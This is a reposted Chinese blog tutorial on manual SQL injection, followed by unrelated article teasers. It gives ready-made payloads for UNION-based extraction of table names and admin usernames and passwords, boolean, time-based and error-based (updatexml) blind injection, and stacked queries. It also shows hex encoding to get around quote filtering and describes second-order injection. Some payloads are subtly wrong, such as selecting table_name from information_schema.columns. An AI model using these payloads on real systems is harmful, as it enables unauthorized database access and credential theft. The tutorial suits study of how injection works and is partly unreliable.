SQL手工注入入门级笔记(更新中)

SQL手工注入入门级笔记(更新中)

news/2025/5/18 7:30:54/文章来源:https://blog.csdn.net/weixin_30445169/article/details/96636857

一、字符型注入

针对如下php代码进行注入：

$sql="select user_name from users where name='$_GET['name']'";

正常访问URL:http://url/xxx.php?name=admin

此时实际数据库语句:

select user_name from users where name='admin'

利用以上结果可想到SQL注入构造语句:

http://url/xxx.php?name=admin' and '1'='1' --'

此时实际数据库语句:

select user_name from users where name='admin' and '1'='1' --''

在上面的sql语句中可以发现，通过闭合原本的单引号，在后面添加新的查询语句，可达到注入目的。（mysql中两个单引号中间为空会被忽略，若出现单个单引号会有语法错误。）

成功后可以开始进行猜解数据库了：

1、猜字段数

and 1=2 union select 1,2,3,4,5,6……（字段数为多少，后面的数字就到几，如union select 1,2,3,4,5能够成功返回结果则表示字段数为5）

或

order by 6 ( 当某一数字正常返回页面就表示有多少个字段)

2、查库

and 1=2 union select 1,2,3,database(),5,6--+ (利用第四个字段的显示位来显示数据库名，具体位置看具体网站)

3、查表

and 1=2 union select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--+ (以MySQL为例 )

4、查字段

and 1=2 union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_schema=database() and table_name='admin'--+ (以MySQL为例，其中admin和单引号可以使用admin的十六进制代替，其他内容也可以。 )

5、查内容

and 1=2 union select 1,2,3,group_concat(username,password),5,6 from admin --+

上述单引号括起来的内容可以替换为内容的十六进制绕过单引号过滤。

二、布尔盲注(Boolean with blind SQL injection)

第一步：猜数据库长度

?id=1' and length(database())>=1--+

>=1可以自己结合场景自己更换。

第二步：猜数据库名

?id=1' and substr(database(),1,1)='a'--+ 普通版

?id=1' and ord(substr(database(),1,1))=97 --+ ASCII码版---与上面意思相同

substr为截取字符串，从1开始。上面这段表示从1开始截取1个字符。

ord为MySQL中转换ASCII码的函数。

当测出第一个字符以后测试第二个字符用substr(database(),2,1)=‘a’--+，一共需要测到第一步中猜测出来的长度。

第三步：猜表名

?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='a'--+ 直接版可以不用猜解数据库名

?id=1' and substr((select table_name from information_schema.tables where table_schema='sql' limit 0,1),1,1)='a'--+ 普通版使用第二步猜解出来的数据库名

?id=1' and ord(substr((select table_name from information_schema.tables where table_schema='sql' limit 0,1),1,1))=97 --+ ASCII码版---与上面意思相同

limit 函数表示取出内容的条数范围，从0开始。上段内容limit 0,1表示从第一个开始取1条。则从第二个开始取一条为:limit 1,1。

第三步：猜字段名

?id=1' and substr((select table_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1),1,1)='a'--+ 直接版可以不用猜解数据库名

?id=1' and substr((select table_name from information_schema.columns where table_schema='sql' table_name='admin' limit 0,1),1,1)='a'--+ 普通版使用第二步猜解出来的数据库名

?id=1' and ord(substr((select table_name from information_schema.columns where table_schema='sql' table_name='admin' limit 0,1),1,1))=97 --+ ASCII码版---与上面意思相同

上述单引号括起来的内容可以替换为内容的十六进制绕过单引号过滤。

第四步：猜内容

?id=1' and substr((select username from admin limit 0,1),1,1)='a'--+ 直接版可以不用猜解数据库名

?id=1' and substr((select username from admin limit 0,1),1,1)='a'--+ 普通版使用第二步猜解出来的数据库名

?id=1' and ord(substr((select username from admin limit 0,1),1,1))=97 --+ ASCII码版---与上面意思相同

三、报错注入

由于程序员或网站维护人员的配置不当，错误信息被输出到了前台，导致可以根据报错进行一系列的操作。

因此可以利用报错注入获取数据，报错注入有很多格式，这里使用updatexml()

1、利用updatexml获取user()

?user=admin‘ and updatexml(1,concat(0x7e,(select user())),1)--+

0x7e为ASCII码的 ~ 波浪号，为了在返回的报错信息中很方便的查看到想要注入得到的数据，没有别的功能性作用。

2、利用updatexml获取database()

?user=admin‘ and updatexml(1,concat(0x7e,(select database())),1)--+

3、利用updatexml获取数据库内容

查表名：?user=admin‘ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1)--+

查询其他内容就不一一列举，在上面一、二板块有详细内容，融会贯通灵活运用就可以。

其他报错函数利用原理大致相同。

四、延时盲注攻击(Sleep with blind SQL injection)

又称为时间盲注，与Boolean注入非常相似，不同之处在于延时注入使用的是sleep()、benchmark()等造成延时的函数从页面返回耗时来判断。

多用IF(exp1,exp2,exp3)结合使用，若exp1为真，则返回exp2，若exp2为假，则返回exp3。

1、判断数据库名长度

?id=1' and if(length(database())>=3,sleep(5),1)

sleep函数中的参数单位为秒。若数据库长度>=3则睡5秒再返回内容给你，否则直接查询1返回结果。

2、判断数据库内容

?id=1' and if( ord(substr((select column_name from information_schema.columns where table_schema='sql' and table_name='admin' limit 0,1),1,1))=97,sleep(5),1) 猜字段名

?id=1' and if(substr((select username from admin limit 0,1),1,1)='a',sleep(5),1) 猜字段内容

其他查询语句可以参考上面一、二介绍的语句。

五、堆叠查询注入攻击

?id=1’ 加了单引号页面返回错误，?id=1' %23以后页面返回正常则可以利用。

闭合原本的查询语句，构造自己的查询语句（利用方式为布尔盲注和时间盲注）。

1、猜数据库名

?id=1'%23 select if(substr(database(),1,1)='a',sleep(5),1)%23 这里利用的是时间盲注

?id=1'%23 select if(ord(substr(database(),1,1))=97 ,sleep(5),1)%23 这里利用的是布尔盲注

2、猜数据库内容

?id=1'%23 if(ord(substr((select table_name from information_schema.tables where table_schema='sql' limit 0,1),1,1))=97,sleep(5),1)%23 猜表名

?id=1'%23 if(ord(substr((select column_name from information_schema.columns where table_schema='sql' and table_name='admin' limit 0,1),1,1))=97,sleep(5),1)%23 猜字段名

其他查询语句可以参考上面一、二、三、四介绍的语句。

六、二次注入

某一次用户输入的恶意构造内容被保存到数据中，当第二次从数据库中去获取该内容时，用户输入的恶意SQL语句截断了第二次查询的查询语句，执行了用户构造的语句。

比如在注册用户时用户名设置为 test‘ 在test后面加个单引号，没有过滤输入而保存到数据库中。当去访问个人中心时，发现显示用户名的地方出现了数据库报错，单引号被带到了查询语句中执行了。

原理就是系统对数据库中的内容没有进行过滤而是采取信任，导致从外部无法注入却从内部上查询中注入成功。

转载于:https://www.cnblogs.com/iAmSoScArEd/p/10593234.html

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/394587.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

materialize_使用Materialize快速介绍材料设计

materialize_使用Materialize快速介绍材料设计

materialize什么是材料设计？ (What is Material Design?) Material Design is a design language created by Google. According to material.io, Material Design aims to combine:Material Design是Google创建的一种设计语言。根据material.io ，Mate…

阅读更多...

python处理完数据导入数据库_python 将execl测试数据导入数据库操作

python处理完数据导入数据库_python 将execl测试数据导入数据库操作

import xlrd import pymysql # 打开execl表 book xlrd.open_workbook(XXXX测试用例.xlsx) sheet book.sheet_by_name(Sheet1) # print(sheet.nrows) # 创建mysql连接 conn pymysql.connect( host127.0.0.1, userroot, password123456, dbdemo1, port3306, charsetutf8 ) # 获…

阅读更多...

增删改查类

增删改查类

<?php // 所有数据表的基类 abstract class Model {protected $tableName "";protected $pdo "";protected $sql"";function __construct() {$pdo new PDO( "mysql:host" . DB_HOST . ";dbname" . DB_NAME, DB_USERN…

阅读更多...

html网页和cgi程序编程,CGI 编程方式学习

html网页和cgi程序编程,CGI 编程方式学习

1.大家都知道CGI是通用网关接口，可以用来编写动态网页。而且CGI可以用很多种语言来写，用perl来编写最常见，我这里就是用perl来编写做例子。讲到编写CGI编程方式，编写CGI有两程编程风格。(1)功能型编程(function-oriented style)这…

阅读更多...

20175305张天钰《java程序设计》第四周课下测试总结

20175305张天钰《java程序设计》第四周课下测试总结

第四周课下测试总结错题某方法在父类的访问权限是public，则子类重写时级别可以是protected。 A .true B .false 正确答案：B 解析：书P122：子类不允许降低方法的访问权限，但可以提高访问权限。复杂题（易错…

阅读更多...

强化学习q学习求最值_通过Q学习更深入地学习强化学习

强化学习q学习求最值_通过Q学习更深入地学习强化学习

强化学习q学习求最值by Thomas Simonini通过托马斯西蒙尼(Thomas Simonini) 通过Q学习更深入地学习强化学习 (Diving deeper into Reinforcement Learning with Q-Learning) This article is part of Deep Reinforcement Learning Course with Tensorflow ?️. Check the syl…

阅读更多...

BZOJ 1113: [Poi2008]海报PLA

BZOJ 1113: [Poi2008]海报PLA

1113: [Poi2008]海报PLA Time Limit: 10 Sec Memory Limit: 162 MBSubmit: 1025 Solved: 679[Submit][Status][Discuss]Description N个矩形,排成一排. 现在希望用尽量少的矩形海报Cover住它们. Input 第一行给出数字N,代表有N个矩形.N在[1,250000] 下面N行,每行给出矩形的长…

阅读更多...

Python自动化运维之常用模块—OS

Python自动化运维之常用模块—OS

os模块的作用：　　os，语义为操作系统，所以肯定就是操作系统相关的功能了，可以处理文件和目录这些我们日常手动需要做的操作，就比如说：显示当前目录下所有文件/删除某个文件/获取文件大小……　　另外&#…

阅读更多...

opengl三维图形图形颜色_【图形学基础】基本概念

opengl三维图形图形颜色_【图形学基础】基本概念

右手坐标系。类似OpenGL遵循的右手坐标系：首先它是三维的笛卡尔坐标系：原点在屏幕正中，x轴从屏幕左向右，最左是-1，最右是1；y轴从屏幕下向上，最下是-1，最上是1；z轴从屏幕里…

阅读更多...

xp职称计算机考试题库,2015年职称计算机考试XP题库.doc

xp职称计算机考试题库,2015年职称计算机考试XP题库.doc

2015年职称计算机考试XP题库.doc (7页)本资源提供全文预览，点击全文预览即可全文预览,如果喜欢文档就下载吧，查找使用更方便哦！9.90 积分2015年职称计算机考试XP题库职称计算机考试考点精编：工具栏的设置与操作XP中将…

阅读更多...

Java基础学习-Path环境变量的配置

Java基础学习-Path环境变量的配置

1.为什么要进行Path环境变量的配置程序的编译和执行需要使用到javac和java命令，所以只能在bin目录下写程序，而实际开发中，我们不可能将程序全部写到bin目录下，所以我们不许让javac和java命令在任意目录下都能够被访问。这时候&…

阅读更多...

rails 共享变量_如何将Rails实例变量传递给Vue组件

rails 共享变量_如何将Rails实例变量传递给Vue组件

rails 共享变量by Gareth Fuller由Gareth Fuller 如何将Rails实例变量传递给Vue组件 (How to pass Rails instance variables into Vue components) I’m currently working with a legacy Rails application. We are slowly transitioning the front-end from Rails views to…

阅读更多...

Leetcode: Counting Bits

Leetcode: Counting Bits

Given a non negative integer number num. For every numbers i in the range 0 ≤ i ≤ num calculate the number of 1s in their binary representation and return them as an array.Example: For num 5 you should return [0,1,1,2,1,2].Follow up:It is very easy to c…

阅读更多...

第一个python爬虫_Python爬虫01——第一个小爬虫

第一个python爬虫_Python爬虫01——第一个小爬虫

Python小爬虫——贴吧图片的爬取在对Python有了一定的基础学习后，进行贴吧图片抓取小程序的编写。目标： 首先肯定要实现图片抓取这个基本功能然后实现对用户所给的链接进行抓取最后要有一定的交互，程序不能太傻吧一、页面获取要让pytho…

阅读更多...

Mac下，如何把项目托管到Github上（Github Desktop的使用）

Mac下，如何把项目托管到Github上（Github Desktop的使用）

在上一篇中，详细讲解了使用X-code和终端配合上传代码的方法，这种方法比较传统，中间会有坑，英文看起来也费劲，不过Github官方提供了一个Mac版的客户端，如下图： 附上下载链接：传送门下…

阅读更多...

计算机网络英文面试题,计算机网络面试题整理

计算机网络英文面试题,计算机网络面试题整理

GET和POST的区别？GET和POST方法没有实质上区别，只是报文格式不同。GET和POST是HTTP协议中的两种请求方法。而 HTTP 协议是基于 TCP/IP 的应用层协议，无论 GET 还是 POST，用的都是同一个传输层协议，所以在传输上&#x…

阅读更多...

利用递归求某数的阶乘——C/C++

利用递归求某数的阶乘——C/C++

#include<stdio.h>int getFactorial(int n) {if(n0)return 1;else return n*getFactorial(n-1); }int main() {int n,res;scanf("%d",&n);res getFactorial(n);printf("%d",res);return 0; } 转载于:https://www.cnblogs.com/daemon94011/p/106…

阅读更多...

intern_充分利用Outreachy Intern申请流程

intern_充分利用Outreachy Intern申请流程

internby Joannah Nanjekye乔安娜南耶基(Joannah Nanjekye) 充分利用Outreachy Intern申请流程 (Get the most out of your Outreachy Intern application process) Outreachy gives three-month paid internships for persons that are underrepresented in tech. Interns ar…

阅读更多...

Put-Me-Down项目Postmortem2

Put-Me-Down项目Postmortem2

一.设想和目标二.计划三.资源四.变更管理五.设计/实现六.测试/发布总结一.设想和目标 1. 我们的软件要解决什么问题？是否定义得很清楚？是否对典型用户和典型场景有清晰的描述？ 我们的软件要帮助低头族控制使用手机时间。功能很明确&#xff0…

阅读更多...

大数据实验报告总结体会_建设大数据中台架构思考与总结

大数据实验报告总结体会_建设大数据中台架构思考与总结

简介本文介绍完善的大数据中台架构了解这些架构里每个部分的位置，功能和含义及背后原理及应用场景。帮助技术与产品经理对大数据技术体系有个全面的了解。数据中台定义：集成离线数仓与实时数仓，并以多数据源统一整合采集到kafka,再通过kafka进…

阅读更多...

最新文章